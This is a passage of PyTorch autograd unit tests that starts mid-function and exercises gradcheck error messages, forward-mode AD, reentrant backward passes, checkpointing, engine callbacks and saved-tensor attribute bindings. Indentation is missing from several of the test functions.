            y.register_hook(hook)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
            with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
                gradcheck(fn, (x,), fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
    """Jacobian-mismatch reporting for R->R, C->C, R->C and C->R functions;
    the complex cases mention the imaginary part in the error message."""
    def check(fast_mode):
        def fn(x):  # R -> R, C -> C
            y = x.clone()
            # The +1e-2 hook corrupts the analytical Jacobian.
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))

        x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
        # NOTE: the complex cases below are pinned to slow mode (fast_mode=False).
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))

        def fn2(x):  # R -> C
            y = torch.complex(x, x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn2, (x,), fast_mode=False)
        self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))

        def fn3(x):  # C -> R
            y = torch.real(x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn3, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
    """gradcheck handles a mix of dense and sparse inputs in one call."""
    def check(fast_mode):
        def fn(x, y):
            return x * y.coalesce().to_dense()
        a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
        b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
        # Batched grad is unsupported with sparse inputs; nnz checking enabled.
        self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
    """Outputs whose shape or dtype changes under perturbation must be
    rejected with an assertion about non-matching outputs."""
    def check(fast_mode):
        def fn(x):
            # Perturbing x below 1 flips the branch and changes the output shape.
            if torch.all(x >= 1):
                return torch.cat([x, x])
            else:
                return x
        a = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
            self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))

        def fn2(x):
            # Same idea but the branch changes the output dtype instead.
            if torch.all(x >= 1):
                return x.to(torch.float32)
            else:
                return x
        with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
            self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
    """The deprecated private get_numerical_jacobian still works but warns,
    and rejects grad_out values other than 1.0."""
    # get_numerical_jacobian is deprecated and no longer used internally by gradcheck
    from torch.autograd.gradcheck import get_numerical_jacobian

    def fn(inputs):
        # get_numerical_jacobian requires fn to take inputs as a tuple
        # and returns the jacobian wrt the first output
        x = inputs[0]
        y = inputs[1]
        return 2 * x + y, x + 2 * y
    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)

    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        # target=a: jacobian of output 0 wrt `a` only -> d(2x+y)/dx = 2*I.
        jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))

    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        # no target: jacobians of output 0 wrt all inputs.
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
    """The deprecated private get_analytical_jacobian warns, reports
    reentrancy correctly, and rejects grad_out != 1.0."""
    from torch.autograd.gradcheck import get_analytical_jacobian

    def fn(x, y):
        return 2 * x + y, x + 2 * y
    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    outputs = fn(a, b)

    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
    self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
    # A deterministic backward runs the same twice -> reentrant.
    self.assertTrue(reentrant)

    class NonDetFunc(Function):
        @staticmethod
        def forward(ctx, x, jitter=0.0):
            ctx._jitter = jitter
            return x

        @staticmethod
        def backward(ctx, grad_out):
            # Random jitter makes two backward runs disagree.
            return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None

    outputs = NonDetFunc.apply(a, 1e-6)
    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
    self.assertFalse(reentrant)

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
    """GradcheckError is raised on failure (and is a RuntimeError subclass);
    non-Gradcheck errors are never swallowed by raise_exception=False."""
    from torch.autograd.gradcheck import GradcheckError

    def check(fast_mode):
        def fn(x):
            y = x.clone()
            # Corrupt the grad so gradcheck fails.
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        # Same failure is also catchable as plain RuntimeError (subclassing).
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))

        def fn2(x):
            raise RuntimeError("Not a GradcheckError!")
        # Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
        with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
            gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_forward_ad(self):
    """check_forward_ad=True validates forward-mode Jacobians for real and
    complex inputs/outputs, and catches a function that tampers with duals."""
    def fn(x, y):
        return x + y, y

    def bad_fn(x, y):
        # Hacky way to check if we're currently inside a forward ad level
        is_running_forward_ad = fwAD._current_level >= 0

        if is_running_forward_ad:
            # Scale the tangent so the forward-mode Jacobian is wrong
            # while the primal (and backward mode) stay correct.
            y_p, y_d = fwAD.unpack_dual(y)
            y = fwAD.make_dual(y_p, y_d * 1.1)

        return x + y, y

    err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"

    for fast_mode in [True, False]:
        # Test for all inputs and outputs being real
        x = torch.rand(2, dtype=torch.double, requires_grad=True)
        y = torch.rand(2, dtype=torch.double, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        def basic_mul(x):
            return torch.view_as_real(torch.resolve_conj(x * 1j))
        gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)

        # Test for one input and one output being complex
        x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        # Test for all inputs and outputs being complex
        y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
    """Running backward in a subprocess must emit the autograd
    thread_shutdown API-usage log on interpreter exit."""
    # The subprocess exercises backward for both 1-d and scalar shapes
    # with a custom Function so autograd worker threads are spun up.
    code = """import torch
from torch.autograd import Function
class MyFunction(Function):
    @staticmethod
    def forward(ctx, x):
        return x

    @staticmethod
    def backward(ctx, grad):
        return grad

for shape in [(1,), ()]:
    v = torch.ones(shape, requires_grad=True)
    MyFunction.apply(v).backward()
"""
    # Captures the subprocess's API-usage stderr stream.
    s = TestCase.runWithPytorchAPIUsageStderr(code)
    self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
    """Deeply nested reentrant backward (2000 levels) must not overflow the
    stack — the engine must offload nested calls instead of recursing."""
    class DeepReentrant(Function):
        @staticmethod
        def forward(ctx, x):
            # Keep a graph-attached, decremented copy for the recursive step.
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            if ctx.x < 0:
                return x
            # Recurse: each backward launches another full backward.
            with torch.enable_grad():
                DeepReentrant.apply(ctx.x).sum().backward()
            return x

    # Test stack overflow escape mechanism
    v = torch.tensor(2000.0, requires_grad=True)
    # This will cause stack overflow if reentrant calls are handled
    # in the same thread recursively
    DeepReentrant.apply(v).sum().backward()

    # Test stack overflow escape mechanism multiple times
    # to ensure reusing workers in the pool works fine
    v2 = torch.tensor(200.0, requires_grad=True)
    DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
    """Reentrant backward tasks must be prioritized over tasks queued at the
    outer level, regardless of sequence numbers."""
    order = []

    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            order.append("MyFunction")
            return x

    class Reentrant(Function):
        @staticmethod
        def forward(ctx, x):
            # Keep a decremented graph-attached copy to recurse on.
            with torch.enable_grad():
                ctx.x = Variable(x.detach(), requires_grad=True)
                ctx.x = ctx.x - 1
            return ctx.x.detach()

        @staticmethod
        def backward(ctx, x):
            order.append("Reentrant")
            if ctx.x < 0:
                return x
            with torch.enable_grad():
                Reentrant.apply(ctx.x).backward()
            return x

    # Starting from 9, Reentrant recurses 10 times (until ctx.x < 0).
    a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
    b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
    v = a * b
    v.backward()
    # The tasks for the Reentrant and MyFunction backward() will be added
    # to the queue in the autograd engine at the same time. The backward
    # for Reentrant will be executed first, which will then add other
    # backward tasks to the queue. We want to ensure all the reentrant tasks
    # are prioritized over the MyFunction backward task regardless of their
    # sequence numbers
    self.assertEqual(len(order), 11)
    self.assertEqual(order.count("Reentrant"), 10)
    self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
    """Stress gradient checkpointing: 2000 checkpointed forward passes
    through a shared module, then one joint backward."""
    num_inp = 2000
    nz_inp = 10
    nz_out = 10  # NOTE(review): appears unused below — presumably kept for symmetry with nz_inp
    nz_bottleneck = 1000

    # small proxy network for some complex reasoning we want to do per input
    module = nn.Sequential(
        nn.Linear(nz_inp, nz_bottleneck),
        nn.ReLU(),
        nn.Linear(nz_bottleneck, nz_inp)
    )

    feat_combined = []
    for r in range(num_inp):
        data_r = torch.empty(1, nz_inp)
        data_r.uniform_()
        data_r.requires_grad = True
        # checkpoint() discards intermediate activations and recomputes
        # them during backward, trading compute for memory.
        feat_r = checkpoint(module, data_r)
        feat_combined.append(feat_r)

    # compute mean as a proxy for some joint reasoning
    mean_combined = torch.stack(feat_combined).mean()
    mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
    """After checkpoint + autograd.grad() raises, the internal
    'checkpoint_valid' flag must be reset so a later backward() succeeds."""
    a = torch.randn(2, 2, requires_grad=True)

    # checkpoint is incompatible with torch.autograd.grad (it requires .backward()).
    with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
        b = checkpoint(torch.exp, a).sum()
        torch.autograd.grad(b, (a,))

    # The failure above must not poison subsequent checkpointed backwards.
    c = checkpoint(torch.exp, a).sum()
    c.backward()
def test_callback_adds_callback(self):
    """A callback queued from inside a backward node may itself queue another
    callback; both must run (counter reaches 2)."""
    called = [0]

    def callback_final():
        called[0] += 1

    def callback_adds_callback():
        called[0] += 1
        # Queue a second callback from within the first.
        Variable._execution_engine.queue_callback(callback_final)

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, grad):
            # Queue the first callback from inside backward execution.
            Variable._execution_engine.queue_callback(callback_adds_callback)
            return grad

    a = torch.rand((3, 3), requires_grad=True)
    b = MyFunc.apply(a)
    b.sum().backward()

    self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
    """Helper: run a reentrant backward and install engine callbacks at the
    requested nesting depths.

    install_callbacks_in_depths: list containing 0 (outer backward) and/or
    1 (inner, reentrant backward). Returns a dict with "inner"/"outer"
    counts of how many times each callback fired.
    """
    counter = {}
    counter["inner"] = 0
    counter["outer"] = 0

    def inc_inner_counter():
        counter["inner"] += 1

    def inc_outer_counter():
        counter["outer"] += 1

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            # Depth 1: runs inside the reentrant (nested) backward.
            if 1 in install_callbacks_in_depths:
                # Add a callback to execute.
                Variable._execution_engine.queue_callback(inc_inner_counter)
            return input

    class MyReentrantFunc(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            # Depth 0: runs in the outer backward.
            if 0 in install_callbacks_in_depths:
                # Add a callback to execute.
                Variable._execution_engine.queue_callback(inc_outer_counter)
            # Reentrant backward call.
            tmp_inp = input.detach().requires_grad_()
            with torch.enable_grad():
                tmp_out = (MyFunc.apply(tmp_inp)).sum()
            tmp_out.backward()
            return input

    t1 = torch.rand((3, 3), requires_grad=True)
    t2 = MyReentrantFunc.apply(t1)
    t3 = t2.sum()
    torch.autograd.backward([t3])

    return counter
def test_reentrant_with_callbacks_depth_0(self):
    """A callback installed only in the outer backward fires exactly once."""
    counts = self._test_reentrant_with_callbacks([0])
    self.assertEqual(1, counts["outer"])
    self.assertEqual(0, counts["inner"])
def test_reentrant_with_callbacks_depth_1(self):
    """A callback installed only in the nested (reentrant) backward fires exactly once."""
    counts = self._test_reentrant_with_callbacks([1])
    self.assertEqual(0, counts["outer"])
    self.assertEqual(1, counts["inner"])
def test_reentrant_with_callbacks_both_depths(self):
    """Callbacks installed at both nesting depths each fire exactly once."""
    counts = self._test_reentrant_with_callbacks([0, 1])
    self.assertEqual(1, counts["outer"])
    self.assertEqual(1, counts["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
    """Smoke-test the codegen'd grad_fn saved-attribute getters: each C++
    saved-field type must surface as the expected Python type, and saved
    tensors must error once freed after backward."""
    # Check that the getter of each type returns what we want
    # See `gen_autograd_functions.py` for how the getters are generated
    #
    # This test is only meant to check if the codegen'd bindings work
    # Please help update this test if you update the names of any the fields we check!
    #
    a = torch.ones(1, requires_grad=True)
    b = torch.ones(1, requires_grad=True)
    out = torch.stack([a, b], dim=0)
    self.assertEqual(out.grad_fn._saved_tensors, (a, b))              # TensorList -> Tuple[Tensor]
    self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
    self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
    self.assertEqual(out.grad_fn._saved_dim, 0)                       # int64_t -> int
    self.assertIsInstance(out.grad_fn._saved_dim, int)

    out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)

    out.sum().backward()
    # After backward, saved tensors are freed; the getters must raise.
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_tensors
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._raw_saved_tensors
    # Non-tensor saved fields survive the free.
    self.assertEqual(out.grad_fn._saved_dim, 0)

    a = torch.ones(2, 2, requires_grad=True)
    indices = torch.tensor([0, 1])
    out = a[:, indices]
    self.assertEqual(out.grad_fn._saved_indices, (None, indices))     # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
    self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
    self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
    self.assertEqual(out.grad_fn._saved_self_sizes, a.shape)          # IntArrayRef -> Tuple[int]
    self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)

    out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
    # Hooks cannot be registered on a saved "None" slot.
    with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
        out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)

    a = torch.ones(2, 2, requires_grad=True)
    out = a * a
    out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
    out.sum().backward()
    with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
        out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.nn.functional.interpolate(a, 4, mode="linear")
    self.assertEqual(out.grad_fn._saved_output_size, (4,))            # c10::optional<IntArrayRef> -> int[]?
    self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
    self.assertEqual(out.grad_fn._saved_align_corners, False)         # bool -> bool
    self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
    self.assertIsNone(out.grad_fn._saved_scale_factors)               # c10::optional<ArrayRef<double>> -> float[]?

    out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
    self.assertIsNone(out.grad_fn._saved_output_size)
    self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
    self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)

    a = torch.ones(2, 2, requires_grad=True)
    out = torch.pdist(a, p=1)
    self.assertEqual(out.grad_fn._saved_p, 1.)                        # double -> float
    self.assertIsInstance(out.grad_fn._saved_p, float)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.logit(a, 1.)
    self.assertEqual(out.grad_fn._saved_eps, 1.)                      # c10:optional<double> -> float?
    self.assertIsInstance(out.grad_fn._saved_eps, float)
    out = torch.logit(a)
    self.assertIsNone(out.grad_fn._saved_eps)

    if torch._C.has_lapack:
        a = torch.ones(1, 1, requires_grad=True)
        q, r = torch.linalg.qr(a, mode="reduced")
        self.assertEqual(q.grad_fn._saved_mode, "reduced")            # std::string -> str

    a = torch.tensor([1.], requires_grad=True)
    out = torch.div(a, 2., rounding_mode="trunc")
    self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc")       # c10::optional<std::string> -> str?
    out = torch.div(a, 2., rounding_mode=None)
    self.assertIsNone(out.grad_fn._saved_rounding_mode)               # c10::optional<std::string> -> str?

    # Scalar saved fields map onto the matching Python numeric type.
    x = torch.zeros(5, requires_grad=True)
    out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex double) -> complex
    cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
    out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex float) -> complex
    out = torch.threshold(x, threshold=1., value=1.)
    self.assertIsInstance(out.grad_fn._saved_threshold, float)        # Scalar(floating point) -> float
    out = torch.threshold(x, threshold=1, value=1)
    self.assertIsInstance(out.grad_fn._saved_threshold, int)          # Scalar(integral) -> int
    out = torch.threshold(x, threshold=False, value=False)
    self.assertIsInstance(out.grad_fn._saved_threshold, bool)         # Scalar(bool) -> bool

    a = torch.ones(2, 2, requires_grad=True)
    out = a.as_strided((3,), (1,), 1)
    self.assertEqual(out.grad_fn._saved_storage_offset, 1)            # c10:optional<int64_t> -> int?
    self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
    out = a.as_strided((3,), (1,))
    self.assertIsNone(out.grad_fn._saved_storage_offset)

    a = torch.ones(2, requires_grad=True)
    out = torch.tanh(a)
    self.assertEqual(out, out.grad_fn._saved_result)                  # saved variable when output

    a = torch.randn(3, 5, requires_grad=True)
    b = torch.tensor([1, 0, 4])
    loss = nn.NLLLoss()
    out = loss(a, b)
    self.assertIsNone(out.grad_fn._saved_weight)
    loss = nn.NLLLoss(weight=torch.ones((5,)))
    out = loss(a, b)
    self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,)))     # c10:optional<Tensor> -> Tensor?

    out.sum().backward()
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
    """SavedTensor lifecycle for custom Functions: raw access, hook
    registration rules (None slots, double-registration, bad arguments),
    and errors after the saved variables are freed by backward."""
    def getFn(save=True):
        class MyFn(Function):
            @staticmethod
            def forward(ctx, x):
                if save:
                    # Deliberately saves a None alongside a real tensor.
                    ctx.save_for_backward(x, None)
                return x

            @staticmethod
            def backward(ctx, g):
                return g

        return MyFn

    a = torch.randn(5, requires_grad=True)

    y = getFn(True).apply(a)

    self.assertEqual((a, None), y.grad_fn.saved_tensors)
    saved = y.grad_fn._raw_saved_tensors
    self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
    # We can't tell the underlying tensor is None without unpacking it
    self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)

    # We catch that error when the user calls register_hooks on it
    with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
        saved[1].register_hooks(lambda x: x, lambda x: x)

    # register_hooks requires exactly two callables (pack, unpack).
    with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
        saved[0].register_hooks(lambda x: x)
    with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
        saved[0].register_hooks(1, 1)
    saved[0].register_hooks(lambda x: x, lambda x: x)
    # Hooks can only be registered once per SavedTensor.
    with self.assertRaisesRegex(RuntimeError, "already been set"):
        saved[0].register_hooks(lambda x: x, lambda x: x)

    y.sum().backward()

    # Using a reference to the SavedTensor object after the
    # saved variables have been released can lead to undefined behavior
    del saved
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        y.grad_fn._raw_saved_tensors
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        y.grad_fn.saved_tensors

    # With nothing saved, both accessors return empty tuples.
    y = getFn(False).apply(a)
    self.assertEqual(y.grad_fn.saved_tensors, ())
    self.assertEqual(y.grad_fn._raw_saved_tensors, ())
    def test_autograd_views_codegen(self):
        """Pin the current view-tracking behavior of the codegen'd view_as and unbind
        ops and when in-place modification of their outputs raises."""
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This test checks the behavior of two codegen functions (view_as and unbind)
        # with respect to view tracking and inplace operation on the output.
        def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
            def maybe_check_raise(fn, should_raise):
                self.assertTrue(should_raise is None or isinstance(should_raise, str))
                if should_raise is not None:
                    with self.assertRaisesRegex(RuntimeError, should_raise):
                        fn()
                else:
                    fn()
            inp = torch.rand(2, requires_grad=requires_grad).clone()
            with torch.set_grad_enabled(grad_mode):
                out = inp.view_as(inp)
            # Are they differentiable views?
            self.assertTrue(out._is_view() == is_view)
            # Are inplace allowed?
            maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
            inp = torch.rand(2, requires_grad=requires_grad).clone()
            with torch.set_grad_enabled(grad_mode):
                out = inp.unbind()
            # Are they differentiable views?
            self.assertTrue(out[0]._is_view() == is_view)
            self.assertTrue(out[1]._is_view() == is_view)
            # Are inplace allowed?
            maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
            maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
        # should_raise contains None if it should not raise
        # should_raise contains a string of the error if it should raise
        # The 3 elements are for view_as, first output of unbind and second output of unbind
        run_test(grad_mode=True, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))
        inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
        run_test(grad_mode=True, requires_grad=True, is_view=True,
                 should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
        leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
        run_test(grad_mode=False, requires_grad=True, is_view=True,
                 should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
